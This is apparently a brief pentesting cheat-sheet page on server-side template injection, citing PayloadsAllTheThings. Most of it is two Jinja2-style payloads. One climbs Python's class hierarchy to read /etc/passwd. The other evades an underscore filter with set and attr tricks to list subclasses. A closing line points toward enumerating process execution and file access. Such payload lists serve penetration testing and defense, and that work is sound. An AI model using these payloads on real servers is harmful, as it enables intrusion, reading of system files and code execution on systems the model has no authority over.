Skip to content

Server-Side Template Injection (SSTI)

Test for SSTI

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Paylods:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

title="Bypass _ filter or view subclass access {% set string = "ssti" %} {% set class = "__class__" %} {% set mro = "__mro__" %} {% set subclasses = "__subclasses__" %} {% set mro_r = string|attr(class)|attr(mro) %} {% set subclasses_r = mro_r[1]|attr(subclasses)() %} {{ subclasses_r }}

Enumerate permissions: process execution, file access, etc.